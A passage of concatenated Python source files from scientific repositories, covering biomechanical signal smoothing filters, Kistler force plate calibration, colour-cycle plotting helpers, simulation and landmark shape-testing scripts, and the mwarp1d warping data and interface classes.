enumerate(cutoffs): ye[:,i,:] = butter_lowpass(y, dt, xx, order=order) return ye def _filtmat(dt, cutoff, order, data): ''' (Code translated from a MATLAB implementation written by <NAME>; MATLAB code received by email without license) ''' return butter_lowpass(data, dt, cutoff, order) def _autocorr(nsignal, dt, order): ''' (Code translated from a MATLAB implementation written by <NAME>; MATLAB code received by email without license) ''' colow = 0.5 coup = 0.25 / dt for i,co in enumerate(np.arange(colow, coup+0.1, 0.1)): ssignal = _filtmat(dt, co, order, nsignal) resid = ssignal - nsignal acorr = np.correlate(resid, resid, mode='full') acorr /= acorr.max() f = np.sum( np.abs(acorr) ) if i==0: fmin = f #objective function coopt = co #(currently) optimum cutoff frequency s = ssignal #(currently) optimally smoothed signal if f < fmin: fmin = f coopt = co s = ssignal return s,coopt def autocorr(y, order=2, time=None): ''' Autocorrelation filtering method. (Code translated from a MATLAB implementation written by <NAME>; MATLAB code received by email from author, without license) Reference: <NAME> (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303–317. ''' dt = 1 if time is None else time[1] - time[0] if y.ndim == 1: ys,cutoff = _autocorr(y, dt, order) else: ys,xopt = [],[] for yy in y: s,c = _autocorr(yy, dt, order) ys.append(s) xopt.append(c) ys,cutoff = np.array(ys), np.array(xopt) return ys def _gcvspl(x, y, m=2, library='gcvspl.so'): ''' Generalized cross-validatory spline filtering (Using this function requires a compiled dynamic link library.) (This code is distributed with a library called "gcvspl.so" which was compiled for Mac using the source code from Twisk (1994), link below.) https://isbweb.org/resources/software-resources/137-signal-processing-software/497-gcvspl-in-c-d-twisk Reference: <NAME>, <NAME> (1979). Smoothing noisy data with splines functions. Numerische Mathematik 31, 377–403. ''' ### load DLL: fnameSO = os.path.join( os.path.dirname(__file__), library) L = ctypes.CDLL(fnameSO) ### assemble required variable types c_int = ctypes.c_int c_double = ctypes.c_double p_double = np.ctypeslib.ndpointer(ctypes.c_double) p_int = np.ctypeslib.ndpointer(ctypes.c_int32) ### specify argument types L.gcvspl.argtypes = [p_double, p_double, p_double, c_int, c_int, p_double, c_double, p_double, c_int] L.splder.argtypes = [c_int, c_int, c_int, c_double, p_double, p_double, p_int, p_double] L.splder.restype = c_double K = 1 NN = x.size MM = 10 MM2 = 2*MM NWK = NN+6*(NN*MM+1) c = np.zeros(NN) wk = np.zeros(NWK) q = np.zeros(MM+1) v = np.zeros(MM2) q0 = np.zeros(NN) q1 = np.zeros(NN) q2 = np.zeros(NN) wy = 1.0 wx = np.ones(NN) n = NN var = -1.0 ier = 0 L.gcvspl(x, y, wx, m, n, c, var, wk, ier) Q = NN ider = 0 #derivative order t = x.copy() l = 2 * np.ones(Q, dtype=np.int32) q = np.zeros(2*m) a = np.array([L.splder(ider, m, n, tt, x, c, l, q) for tt in t]) return a def gcvspl(x, y, m=3): ''' Generalized cross-validatory spline filtering (Using this function requires a compiled dynamic link library.) (This code is distributed with a library called "gcvspl.so" which was compiled for Mac using the source code from Twisk (1994), link below.) https://isbweb.org/resources/software-resources/137-signal-processing-software/497-gcvspl-in-c-d-twisk Reference: <NAME>, <NAME> (1979). Smoothing noisy data with splines functions. Numerische Mathematik 31, 377–403. INPUTS: *x* : 1D time vector ( (Q,) array ) *y* : 1D measurement ( (Q,) array ) *m* : half-order (int); spline degree = (2*m - 1) OUTPUTS: *ys* : smoothed 1D measurement ( (J,Q) array ) ''' if y.ndim==2: ys = np.array([_gcvspl(x, yy, m) for yy in y]) else: ys = _gcvspl(x, y, m) return ys def _ssa(x, L=5, ncomponents=2): ''' Singular Spectrum Analysis smoother Adapted from the MATLAB code "ssa.m" by <NAME> The original MATLAB code was downloaded on 2017-11-20 from: https://www.mathworks.com/matlabcentral/fileexchange/8115-singular-spectrum-analysis-smoother?s_tid=prof_contriblnk References: <NAME>., <NAME>., <NAME>., 2001. Analisys of Time Series Structure - SSA and Related Techniques. Chapman & Hall/CR <NAME>., <NAME>, <NAME>., (2005), Application of singular spectrum analysis to the smoothing of raw kinematic signals. J. Biomech. 38, 1085-1092. ''' #Step 1: Build trajectory matrix: N = x.size L = (N - L) if (L > N/2) else L K = N - L + 1 X = np.zeros((L, K)) for i in range(K): X[:L, i] = x[i:L+i] X = np.matrix( X ) #Step 2: SVD U,s,v = np.linalg.svd(X) V = X.T * U rc = U * V.T #Step 3: Grouping I = range(ncomponents) rca = U[:, I] * V.T[I] #Step 4: Reconstruction y = np.zeros(N) Lp = min(L, K) Kp = max(L, K) for k in range(0, Lp-1): for m in range(k+1): y[k] += (1.0/(k+1)) * rca[m,k-m] for k in range(Lp-1, Kp): for m in range(Lp): y[k] += (1.0/Lp) * rca[m,k-m] for k in range(Kp, N): for m in range(k-Kp+1, N-Kp+1): y[k] += (1.0/(N-k)) * rca[m,k-m] return y def ssa(y, L, ncomponents=2): ''' Singular Spectrum Analysis smoother Adapted from the MATLAB code "ssa.m" by <NAME> The original MATLAB code was downloaded on 2017-11-20 from: https://www.mathworks.com/matlabcentral/fileexchange/8115-singular-spectrum-analysis-smoother?s_tid=prof_contriblnk References: <NAME>., Nekrutkin, V., <NAME>., 2001. Analisys of Time Series Structure - SSA and Related Techniques. Chapman & Hall/CR <NAME>., <NAME>, <NAME>., (2005), Application of singular spectrum analysis to the smoothing of raw kinematic signals. J. Biomech. 38, 1085-1092. ''' if y.ndim==2: ys = np.array([_ssa(yy, L, ncomponents) for yy in y]) else: ys = _ssa(y, L, ncomponents) return ys def _wavelet_single(y): ''' Wachowiak (2000) Following code from: http://jseabold.net/blog/2012/02/23/wavelet-regression-in-python/ ''' yy,nadd = paddon(y) coefs = pywt.wavedec(yy, 'db8', level=None, mode='per') sigma = mad( coefs[-1] ) uthresh = sigma * sqrt( 2*log(len(y)) ) denoised = coefs[:] denoised[1:] = (pywt.threshold(i, value=uthresh, mode='soft') for i in denoised[1:]) ys = pywt.waverec(denoised, 'db8', mode='per') ys = paddoff(ys, nadd) return ys def wavelet(y): ''' Wachowiak (2000) Following code from: http://jseabold.net/blog/2012/02/23/wavelet-regression-in-python/ ''' if y.ndim == 1: ys = _wavelet_single(y) else: ys = np.array([_wavelet_single(yy) for yy in y]) return ys def wiener(y, window_rel=0.05): ''' Weiner filter This is a convenience interface to scipy.signal.wiener ''' n = y.size if y.ndim==1 else y.shape[1] window = round_up_to_odd( window_rel * n ) ys = np.array([scipy.signal.wiener(yy, window, None) for yy in y]) return ys ```
{ "source": "0todd0000/BMC", "score": 3 }
#### File: BMC/functions/kistler_fp_cal.py ```python from __future__ import division, print_function import numpy as np __author__ = '<NAME>, https://github.com/demotu/BMC' __version__ = 'kistler_fp_cal.py v.1 2014/12/12' def kistler_fp_cal(data, S_matrix=None, fxfy_range=0, fz_range=0, origin=None, fp_type=3, show=False, axs=None): """Kistler force plate calibration In order to get proper signals of a Kistler force plate, we have to calibrate the acquired data according to the factory calibration (i.e., transform the readed values in volts of the 8 channels to values in newtons for fx12, fx34, fy14, fy23, fz1, fz2, fz3, fz4) and then calculate the resultant forces (Fx, Fy, Fz), resultant moments of force (Mx, My, Mz), and center of pressure (COPx, COPy) quantities. See [1]_ and [2]_ Parameters ---------- data : array_like [fx12, fx34, fy14, fy23, fz1, fz2, fz3, fz4] Kistler force plate data (8 columns, in Volts) S_matrix : array_like sensitivity matrix for Kistler force plate (8 columns) and at least one row fxfy_range : number [0, 1, 2, 3], optional Fx/Fy amplifier range used in the data acquisition Fx/Fy [kN]: 0.25, 1.25, 2.5, 5 This is only used if the sensitivity matrix has more than one row and the first four columns of the corresponding row are selected. fz_range : number [0, 1, 2, 3], optional Fz amplifier range used in the data acquisition Fz [kN]: 1, 5, 10, 20 This is only used if the sensitivity matrix has more than one row and the last four columns of the corresponding row are selected. origin : array_like [a, b, az0] coordinates of the force plate origin (az0 is negative, in meters) fp_type : number [1, 2, 3, 4] type of force plate to be used in the COP correction 1: type 9281E11 2: type 9281E and 9281EA (SN: <= 616901) 3: type 9281E and 9281EA (SN: >= 616902) 4: type 9287C, 9287CA show : bool, optional (default = False) if True (1), plot data in matplotlib figure. axs : a matplotlib.axes.Axes instance, optional (default = None). Returns ------- grf : numpy array [Fx, Fy, Fz, Mx, My, Mz] ground reaction force data cop : numpy array [COPx, COPy] center of pressure data References ---------- .. [1] http://isbweb.org/software/movanal/vaughan/kistler.pdf .. [2] http://nbviewer.ipython.org/github/demotu/BMC/blob/master/notebooks/KistlerForcePlateCalculation.ipynb """ if not S_matrix: # sensitivity matrix for Kistler force plate 9281EA Serial no. 4402018 # calibrated range # Fx/Fy [kN]: 0.25, 1.25, 2.5, 5 # Fz [kN]: 1, 5, 10, 20 S_matrix = np.array([[38.117, 37.723, 38.062, 38.008, 19.492, 19.445, 19.426, 19.457], [ 7.623, 7.545, 7.212, 7.602, 3.898, 3.889, 3.885, 3.891], [ 3.803, 3.761, 3.800, 3.796, 1.951, 1.945, 1.944, 1.948], [ 1.901, 1.881, 1.900, 1.898, 0.976, 0.973, 0.972, 0.974]]) S_matrix = np.atleast_2d(S_matrix) S_matrix = np.hstack((S_matrix[fxfy_range, 0:4], S_matrix[fz_range, 4:9])) if not origin: # origin for Kistler force plate 9281EA Serial no. 4402018 origin = np.array([0.120, 0.200, -0.048]) a, b, az0 = np.hsplit(np.asarray(origin), 3) # COP correction coefficients if fp_type == 1: # Type 9281E11 Px = [2.51997E-15, -2.18826E-10, -2.69254E-07, -4.85912E-11, 4.55731E-6, -4.18892E-2] Py = [2.83750E-15, -1.00051E-10, -2.05349E-06, -1.16374E-10, 4.71553E-6, 6.89265E-2] elif fp_type == 2: # Type 9281E and 9281EA (SN: <= 616901) Px = [1.1604E-14, -8.39091E-10, -1.44293E-6, -2.85927E-10, 2.05575E-5, -0.113525] Py = [1.27251E-14, -3.13238E-10, -3.33888E-6, -6.49641E-10, 1.53937E-5, 1.12624E-1] elif fp_type == 3: # Type 9281E and 9281EA (SN: >= 616902) Px = [7.92063E-15, -5.821E-10, -2.77102E-6, -1.76083E-10, 1.29695E-5, -0.0413979] Py = [8.82869E-15, -2.48554E-10, -1.76282E-6, -4.22186E-10, 1.2091E-5, 5.16279E-2] elif fp_type == 4: # Type 9287C, 9287CA Px = [1.72454E-16, -4.82275E-11, 3.30016E-7, -9.46569E-12, 2.78736E-6, -8.20399E-3] Py = [2.20428E-16, -1.80864E-11, -7.30249E-7, -3.03080E-11, 2.64974E-6, 5.41166E-2] else: Px = [] Py = [] # Calibration data = 1000*data/S_matrix fx12, fx34, fy14, fy23, fz1, fz2, fz3, fz4 = np.hsplit(data, 8) # Medio-lateral force Fx = fx12 + fx34 # Anterior-posterior force Fy = fy14 + fy23 # Vertical force Fz = fz1 + fz2 + fz3 + fz4 # Plate moment about X-axis Mx = b * (fz1 + fz2 - fz3 - fz4) # Plate moment about Y-axis My = a * (-fz1 + fz2 + fz3 - fz4) # Plate moment about Z-axis Mz = b * (-fx12 + fx34) + a * (fy14 - fy23) # Plate moment about top plate surface Mx = Mx + Fy*az0 # Plate moment about top plate surface My = My - Fx*az0 # X-Coordinate of force application point (COP) ax = -My / Fz # Y-Coordinate of force application point (COP) ay = Mx / Fz # Coefficient of Friction x-component #COFx = Fx / Fz # Coefficient of Friction y-component #COFy = Fy / Fz # COP correction if Px: Dax = (Px[0]*ay**4 + Px[1]*ay**2 + Px[2])*ax**3 + (Px[3]*ay**4 + Px[4]*ay**2 + Px[5])*ax ax = ax - Dax if Py: Day = (Py[0]*ax**4 + Py[1]*ax**2 + Py[2])*ay**3 + (Py[3]*ax**4 + Py[4]*ax**2 + Py[5])*ay ay = ay - Day # Free moment Mz = Mz - Fy*ax + Fx*ay grf = np.hstack((Fx, Fy, Fz, Mx, My, Mz)) cop = np.hstack((ax, ay)) if show: _plot(grf, cop, axs) return grf, cop def _plot(grf, cop, axs): """Plot results of the detect_peaks function, see its help.""" try: import matplotlib.pyplot as plt except ImportError: print('matplotlib is not available.') else: grf = np.hstack((grf, cop)) if axs is None: _, axs = plt.subplots(4, 2, figsize=(8, 6), sharex=True) axs = axs.flatten() ylabel = ['Fx [N]', 'Fy [N]', 'Fz [N]', 'Mx [Nm]', 'My [Nm]', 'Mz [Nm]', 'COPx [m]', 'COPy [m]'] for i, axi in enumerate(axs): axi.plot(grf[:, i], 'b', lw=1) axi.set_ylabel(ylabel[i], fontsize=14) axi.yaxis.set_major_locator(plt.MaxNLocator(4)) axi.yaxis.set_label_coords(-.2, 0.5) axs[6].set_xlabel('Sample #', fontsize=14) axs[7].set_xlabel('Sample #', fontsize=14) plt.suptitle('Ground reaction force data', y=1.02, fontsize=16) plt.tight_layout(h_pad=.1) # plt.grid() plt.show() ```
{ "source": "0todd0000/ci1d", "score": 3 }
#### File: plot/plotly/_base.py ```python class PatchLine(object): def plot(self, ax, w=0.1, ec=None, fc='b', lw=1): pass class MultiColorPatchLine(PatchLine): def plot(self, ax, w=0.1, cmap='jet', alpha=0.5, ec=None, ew=1, vmin=None, vmax=None, th=None): pass ``` #### File: plot/plotly/colors.py ```python from copy import deepcopy import numpy as np from matplotlib import pyplot as plt from matplotlib import colors _cycle_default = deepcopy( plt.rcParams['axes.prop_cycle'] ) def reset_color_cycle(): set_color_cycle('default') def set_color_cycle(cyclename=None): cyclename = 'cr1d' if (cyclename is None) else cyclename setter = ColorCycleSetter() setter.set_cycle( cyclename ) class ColorCycleSetter(object): def __init__(self): self.cycle_default = _cycle_default self.cycle_cr1d = plt.cycler( color=CR1DColorMap().hex ) def set_cycle(self, cyclename='cr1d'): if cyclename not in ['cr1d', 'default']: raise ValueError('"cyclename" must be "cr1d" or "default"') cycle = self.cycle_cr1d if (cyclename == 'cr1d') else self.cycle_default plt.rcParams['axes.prop_cycle'] = cycle class CR1DColorMap(object): rgb = [ (148,202,130), (150,179,221), (187,147,194), (153,156,205), (126,206,244), (127,197,194), (127,156,172), (192,163,108), ] @property def name(self): return self.__class__.__name__ @property def cmap(self, bgcolor=None): return colors.LinearSegmentedColormap.from_list(self.name, self.rgb01) @property def hex(self): return [colors.rgb2hex(c) for c in self.rgb01] @property def rgb01(self, bgcolor=None): return 1.0/255 * np.asarray(self.rgb) def colors(self, n): return self.cmap( np.linspace(0, 255, n) ) def colorbar_image(self, n=256, vertical=True): I = np.vstack([range(n)]*10) if vertical: I = I.T return I def set_prop_cycle(self, ax): ax.set_prop_cycle(color=self.hex) ``` #### File: examples/sim/sim_bv1d.py ```python import os from pathlib import Path import numpy as np from matplotlib import pyplot as plt import cr1d from spm1d import rft1d def run_single_iteration(J, fwhm): y = mu + rft1d.random.multirandn1d(J, Q, I, fwhm, W) # bivariate Gaussian 1D data ynew = mu + rft1d.random.multirandn1d(1, Q, I, fwhm, W)[0] # an additional random observation ds = cr1d.BivariateDataset1D(y) cr = ds.get_confidence_region(alpha=alpha) pr = ds.get_prediction_region(alpha=alpha) ci2 = ds.get_ci2(alpha=alpha) in_cr = cr.isinside(mu) # mu in confidence region? in_pr = pr.isinside(ynew) # ynew in prediction region? in_ci2 = ci2.isinside(mu) # mu in CI2? ynew_in_ci2 = ci2.isinside(ynew) # ynew in CI2? return in_cr, in_pr, in_ci2, ynew_in_ci2 #(0) Initialize parameters: np.random.seed(0) # seed the random number generator to replicate results alpha = 0.05 # Type I error rate J = np.array([5, 6, 7, 8, 9, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 120, 140, 160, 180, 200]) # sample sizes FWHM = np.array([5, 10, 20, 30, 40, 50]) # smoothness values Q = 101 # number of continuum nodes I = 2 # number of vector components mu = np.zeros((Q,I)) # true population mean W = np.eye(2) # population covariance niter = 10000 # number of simulation iterations (set this to 10000 to replicate the paper's results) #(1) Simulate: FPR = [] # false positive rate (outer loop) for JJ in J: fpr = [] # false positive rate (inner loop) for fwhm in FWHM: print('J=%d, FWHM=%d...'%(JJ,fwhm)) inregion = np.array([run_single_iteration(JJ, fwhm) for i in range(niter)]) avg_inregion = inregion.mean(axis=0) fpr.append( 1 - avg_inregion ) FPR.append( fpr ) FPR = np.array(FPR) #(2) Save results dir0 = Path( __file__ ).parents[2] # Main repository directory fnameNPZ = os.path.join(dir0, 'Data', 'Simulation', 'results1d.npz') # Simulation results file name np.savez_compressed(fnameNPZ, fpr=FPR, J=J, FWHM=FWHM) # #(3) Plot results: # plt.close('all') # fig,AX = plt.subplots(2, 2, figsize=(8,6) ) # for i,ax in enumerate( AX.flatten() ): # ax.plot(J, FPR[:,:,i]) # ax.legend(['CR', 'PR', 'CI2-mu', 'CI2-new']) # ax.axhline(0.05, color='k', ls=':') # plt.show() ```
{ "source": "0todd0000/lmfree2d", "score": 3 }
#### File: lmfree2d/Python/landmarks_massmv.py ```python import os import numpy as np from matplotlib import pyplot as plt import pandas as pd import spm1d import lmfree2d as lm def two_sample_mass_multivariate_test(r0, r1): # calculate test statistic values at each landmark: spm = spm1d.stats.nonparam.hotellings2(r0, r1) # conduct nonparametric mass-multivariate inference: spmi = spm.inference(0.05, iterations=-1) # assemble results: z = spmi.z # test statistic value for each landmark zstar = spmi.zstar # critical test statistic zmax = z.max() # maximum test statistic value pdf = spmi.PDF0 # permutation distribution p = ( pdf >= zmax).mean() # p value (percentage of values in pdf greater than or equal to T2max) return dict(zmax=zmax, zstar=zstar, p=p, z=z) # #(0) Conduct mass multivariate two-sample test for one dataset: # ### load data: # dirREPO = lm.get_repository_path() # name = 'Bell' # fname = os.path.join(dirREPO, 'Data', name, 'landmarks_gpa.csv') # df = pd.read_csv(fname, sep=',') # ### convert to 3D array (nshapes, nlandmarks, 2) # nshapes = df['SHAPE'].max() # nlm = df['LANDMARK'].max() # r = np.reshape( df[['X','Y']].values, (nshapes,nlm,2) ) # ### separate into groups: # r0,r1 = r[:5], r[5:] # ### run nonparametric permutation test: # res = two_sample_mass_multivariate_test(r0, r1) # print(res) #(1) Conduct mass multivariate two-sample test for all datasets: dirREPO = lm.get_repository_path() names = ['Bell', 'Comma', 'Device8', 'Face', 'Flatfish', 'Hammer', 'Heart', 'Horseshoe', 'Key'] results = [] for name in names: ### load data: fname0 = os.path.join(dirREPO, 'Data', name, 'landmarks_gpa.csv') df = pd.read_csv(fname0, sep=',') ### convert to 3D array (nshapes, nlandmarks, 2) nshapes = df['SHAPE'].max() nlm = df['LANDMARK'].max() r = np.reshape( df[['X','Y']].values, (nshapes,nlm,2) ) ### separate into groups: r0,r1 = r[:5], r[5:] ### run nonparametric permutation test: res = two_sample_mass_multivariate_test(r0, r1) results.append(res) print(name, res['zmax'], res['p']) ### save: fname1 = os.path.join(dirREPO, 'Results', 'landmarks_massmv.csv') n = max([res['z'].size for res in results]) header = 'Name,T2max,T2crit,P,' + ','.join( ['T2-%d'%(i+1) for i in range(n)] ) with open(fname1, 'w') as f: f.write(header + '\n') for name,res in zip(names,results): zmax,zc,p,z = res['zmax'], res['zstar'], res['p'], res['z'] fmt = ('%s,' + '%.3f,'*(z.size+3))[:-1] + '\n' f.write( fmt % ((name,zmax,zc,p)+tuple(z)) ) ```
{ "source": "0todd0000/mwarp1d", "score": 2 }
#### File: ui/dataio/data.py ```python import os import numpy as np from scipy.io import savemat import mwarp1d class _MWarp1DData(object): mode = None #manual or landmark fname0 = None #input data file name fname1 = None #output data file name ydata_template = None #template continuum ydata_sources = None #source continua ydata_sources_warped = None #warper sources def __init__(self): pass def __repr__(self): s = '%s (%s)\n' %(self.__class__.__name__, self.mode) s += ' ----- FILES -----\n' s += ' fname0 = %s\n' %self.fname0 s += ' fname1 = %s\n' %self.fname1 s += ' ----- DATA -----\n' s += ' num nodes = %d\n' %self.nnodes s += ' num sources = %d\n' %self.nsources return s @property def nnodes(self): n = 0 if (self.ydata_template is None) else self.ydata_template.size return n @property def nsources(self): n = 0 if (self.ydata_sources is None) else self.ydata_sources.shape[0] return n def _init_other_attributes(self): pass def _parse_input_file(self, s): y = np.loadtxt(s, delimiter=',') self.ydata_template = y[0] self.ydata_sources = y[1:] self.ydata_sources_warped = y[1:].copy() self._init_other_attributes() def get_dictionary(self): d = {} d['mode'] = self.mode d['filename0'] = self.fname0 d['filename1'] = self.fname1 d['ydata_template'] = self.ydata_template d['ydata_sources'] = self.ydata_sources d['ydata_sources_warped'] = self.ydata_sources_warped return d def save(self): np.savez_compressed( self.filenameNPZ, self.get_dictionary() ) def save(self): np.savez_compressed( self.fname1, **self.get_dictionary() ) def set_input_filename(self, s, read=True): self.fname0 = s if read: self._parse_input_file(s) # self._init_other_attributes() if self.fname1 is None: dir1 = os.path.dirname(s) fname1 = 'mwarp1d_results.npz' self.fname1 = os.path.join(dir1, fname1) def set_output_filename(self, s): self.fname1 = s def set_sources(self, y, init_warped=False): self.ydata_sources = y self._init_other_attributes() if init_warped: self.set_sources_warped( y.copy() ) def set_sources_warped(self, y): self.ydata_sources_warped = y def set_template(self, y): self.ydata_template = y def write_mat(self, fname): savemat(fname, self.get_dictionary(format='matlab')) def write_sources_warped_csv(self, fname): np.savetxt(fname, self.ydata_sources_warped, delimiter=',') class DataLandmark(_MWarp1DData): mode = 'landmark' landmarks_template = None landmarks_sources = None landmark_labels = None def _init_other_attributes(self): pass def apply_warps(self, y): lm0 = self.landmarks_template lm = self.landmarks_sources J = y.shape[0] if y.ndim==2: if J==self.nsources: #only sources submitted yw = [mwarp1d.warp_landmark(yy, xx, lm0) for xx,yy in zip(lm,y)] else: #template also submitted (first row) yw = [mwarp1d.warp_landmark(yy, xx, lm0) for xx,yy in zip(lm,y[1:])] yw = [y[0]] + yw else: yw = np.random.randn(5,101,3) Yw = [] for i in range(y.shape[2]): if J==self.nsources: #only sources submitted yw = [mwarp1d.warp_landmark(yy, xx, lm0) for xx,yy in zip(lm,y[:,:,i])] else: #template also submitted (first row) yw = [mwarp1d.warp_landmark(yy, xx, lm0) for xx,yy in zip(lm,y[1:,:,i])] yw = [y[0,:,i]] + yw Yw.append( np.array(yw) ) yw = np.dstack(Yw) return np.array(yw) def get_dictionary(self): d = super().get_dictionary() d['landmarks_template'] = self.landmarks_template d['landmarks_sources'] = self.landmarks_sources d['landmark_labels'] = self.landmark_labels return d def set_landmark_labels(self, x): self.landmark_labels = x def set_template_landmarks(self, x): self.landmarks_template = x def set_source_landmarks(self, x): self.landmarks_sources = x def write_landmarks_csv(self, fname): labels = self.landmark_labels lm0 = np.asarray(self.landmarks_template, dtype=str) lm1 = np.asarray(self.landmarks_sources, dtype=str) # write: header = ','.join(labels) blanks = ','.join( ['-']*len(labels) ) with open(fname, 'w') as fid: fid.write( header + '\n' ) fid.write( ','.join(lm0) + '\n' ) fid.write( blanks + '\n' ) for a in lm1: fid.write( ','.join(a) + '\n' ) class DataManual(_MWarp1DData): mode = 'manual' seqwarps = None def _init_other_attributes(self): J,Q = self.ydata_sources.shape self.seqwarps = np.empty(J, dtype=object) def apply_warps(self, y): J,Q = y.shape[:2] swarps = [] for params in self.seqwarps: sw = mwarp1d.SequentialManualWarp() if params is not None: for p in params: amp,center,head,tail = p w = mwarp1d.ManualWarp1D(Q) w.set_center(center) w.set_amp(amp) w.set_head(head) w.set_tail(tail) sw.append( w ) swarps.append(sw) if y.ndim==2: if J==self.nsources: #only sources submitted yw = [ww.apply_warp_sequence(yy) for ww,yy in zip(swarps, y)] else: #template also submitted (first row) yw = [ww.apply_warp_sequence(yy) for ww,yy in zip(swarps, y[1:])] yw = [y[0]] + yw else: yw = np.random.randn(5,101,3) Yw = [] for i in range(y.shape[2]): if J==self.nsources: #only sources submitted yw = [ww.apply_warp_sequence(yy) for ww,yy in zip(swarps, y[:,:,i])] else: #template also submitted (first row) yw = [ww.apply_warp_sequence(yy) for ww,yy in zip(swarps, y[1:,:,i])] yw = [y[0,:,i]] + yw Yw.append( np.array(yw) ) yw = np.dstack(Yw) return np.array(yw) def get_dictionary(self, format=None): d = super().get_dictionary() w = self.seqwarps if format=='matlab': b = np.array([ww is None for ww in w]) w[b] = np.nan d['seqwarps'] = w return d ``` #### File: figures/artists/collection.py ```python from PyQt5 import QtWidgets, QtCore from . selectable_line import Template,Source from . draggable_points import TemplateLandmarks,SourceLandmarks from . stack import SelectionStack class _LinePointCollection(QtCore.QObject): LandmarksClass = TemplateLandmarks LineClass = Template point_deleted = QtCore.pyqtSignal(object, int) selected = QtCore.pyqtSignal(object, int) def __init__(self, ax, y): super().__init__() self.ax = ax self.line = self.LineClass(ax, y, collection=self) self.h = self.line.h self.landmarks = None self.stack = None def add_landmark(self, x): self.landmarks.add_point(x) def get_line_x(self): return self.line.get_xdata() def get_line_y(self): return self.line.get_ydata() @property def isvisible(self): return self.line.isvisible def on_point_deleted(self, ind): self.point_deleted.emit(self.landmarks, ind) def set_landmarks(self, x): self.landmarks = self.LandmarksClass(self.ax, x, y_constraint=self.get_line_y(), collection=self) self.stack = SelectionStack(self.ax, [self.landmarks, self.line]) self.line.set_notify(False) self.landmarks.set_notify(False) self.stack.set_notify(True) self.selected = self.stack.selected self.landmarks.point_deleted.connect( self.on_point_deleted ) def set_active(self, active): self.line.set_active(active) if self.landmarks is not None: self.landmarks.set_active(active) def set_notify(self, notify): self.stack.set_notify(notify) def set_visible(self, visible): self.landmarks.set_visible(visible) self.line.set_visible(visible) class SourceWithLandmarks(_LinePointCollection): LandmarksClass = SourceLandmarks LineClass = Source def calculate_mse(self, template): y0 = template.line.h.get_ydata() y = self.h.get_ydata() return ((y-y0)**2).mean() class TemplateWithLandmarks(_LinePointCollection): LandmarksClass = TemplateLandmarks LineClass = Template ``` #### File: figures/artists/draggable_points.py ```python from PyQt5 import QtWidgets, QtCore from math import floor import numpy as np from . _base import _SelectableArtist2D class _DraggablePoints(_SelectableArtist2D): dragged = QtCore.pyqtSignal(object, int, int, float) dragging_stopped = QtCore.pyqtSignal() point_added = QtCore.pyqtSignal(int, int) point_deleted = QtCore.pyqtSignal(int) point_delete_failed = QtCore.pyqtSignal() maxpointsreached = QtCore.pyqtSignal(int) color_active = 0.98, 0.7, 0.3 color_inactive = '0.7' dragging_enabled = True dragging = False # n = 0 #number of points nmax = 8 #maximum number of points selected_ind = None xminmax = None def __init__(self, ax, x, y_constraint=None, collection=None): super().__init__(ax, collection) self.Q = y_constraint.size # self.n = len(x) self.h = self.ax.plot(x, y_constraint[x], 'o', ms=8, color=self.color_active, markeredgecolor='w', zorder=self.zorder)[0] self.y_constraint = y_constraint self.ax.figure.canvas.mpl_connect('button_release_event', self.on_release) self.ax.figure.canvas.mpl_connect('motion_notify_event', self.on_motion) @property def n(self): return self.h.get_xdata().size @property def values(self): return self.h.get_xdata() def add_point(self, x): if self.n < self.nmax: y = self.y_constraint[x] x0,y0 = self.get_point_coordinates() x0,y0 = np.append(x0, x), np.append(y0, y) ind = np.argsort(x0) self.set_point_coordinates(x0[ind], y0[ind]) # self.n += 1 self.ax.figure.canvas.draw() col = x0[ind].tolist().index(x) self.point_added.emit(col, x) else: self.maxpointsreached.emit(self.nmax) def delete_point(self, ind): deleted = False if self.n > 1: x,y = self.get_point_coordinates() x = np.hstack((x[:ind], x[ind+1:])) y = np.hstack((y[:ind], y[ind+1:])) self.set_point_coordinates(x, y) deleted = True self.point_deleted.emit(ind) self.ax.figure.canvas.draw() else: self.point_delete_failed.emit() return deleted def get_point_coordinates(self): x,y = self.h.get_xdata(), self.h.get_ydata() return x,y def get_previous_point(self, ind): return None if (ind==0) else (ind-1) def get_previous_x(self, ind0): ind = self.get_previous_point(ind0) return None if (ind is None) else self.h.get_xdata()[ind] def get_next_point(self, ind): return None if (ind==(self.n-1)) else (ind+1) def get_next_x(self, ind0): ind = self.get_next_point(ind0) return None if (ind is None) else self.h.get_xdata()[ind] def get_xminmax(self, ind): x0,x1 = self.get_previous_x(ind), self.get_next_x(ind) x0 = 2 if (x0 is None) else x0+2 x1 = self.Q-3 if (x1 is None) else x1-2 return x0,x1 def on_motion(self, event): if event.inaxes: # # self.crosshairs.update(x, y) if self.dragging_enabled and self.dragging: ind = self.selected_ind x = floor(event.xdata) x0,x1 = self.xminmax x = min(x1, max(x0, x)) y = self.y_constraint[x] self.set_data(ind, x, y) self.dragged.emit(self, ind, x, y) def on_selected(self, ind, distance): super().on_selected(ind, distance) self.dragging = True self.selected_ind = ind self.xminmax = self.get_xminmax(ind) def on_release(self, event): self.dragging_stopped.emit() self.dragging = False self.selected_ind = None self.xminmax = None def set_active(self, active): super().set_active(active) self.isselectable = active def set_all_xdata(self, x): self.h.set_xdata(x) self.h.set_ydata( self.y_constraint[x] ) def set_data(self, ind, xnew, ynew): x,y = self.h.get_xdata(), self.h.get_ydata() x[ind] = xnew y[ind] = ynew self.h.set_xdata(x) self.h.set_ydata(y) def set_dragging_enabled(self, enabled): self.dragging_enabled = enabled def set_point_coordinates(self, x, y): self.h.set_xdata(x) self.h.set_ydata(y) class SourceLandmarks(_DraggablePoints): color_active = 0.98, 0.7, 0.3 zorder = 1 def set_active(self, active): super().set_active(active) self.h.set_visible(active) class TemplateLandmarks(_DraggablePoints): color_active = 0.3, 0.3, 0.98 zorder = 3 ``` #### File: figures/artists/warpable_line.py ```python from PyQt5 import QtWidgets, QtCore import numpy as np from . _base import _SelectableArtist2D import mwarp1d class _WarpableLine(_SelectableArtist2D): linewidth = 0.5 iswarpable = True selected = QtCore.pyqtSignal(object, int, float) warp_initiated = QtCore.pyqtSignal(object, int) def __init__(self, ax, y): super().__init__(ax, None) self.Q = y.size self.x0 = np.arange(self.Q) #original (unwarped) domain self.y0 = y #original (unwarped) data self.xw = self.x0.copy() #current warped domain self.yw = y.copy() #current warped data (updated only after saving warp) self.seqw = mwarp1d.SequentialManualWarp() self.h0 = self.ax.plot(y, ':', lw=2, color=(0.8,0.3,0.3), zorder=self.zorder-1)[0] #original, unwarped curve self.h = self.ax.plot(y, '-', lw=self.linewidth, color=self.color_active, zorder=self.zorder)[0] #current warped 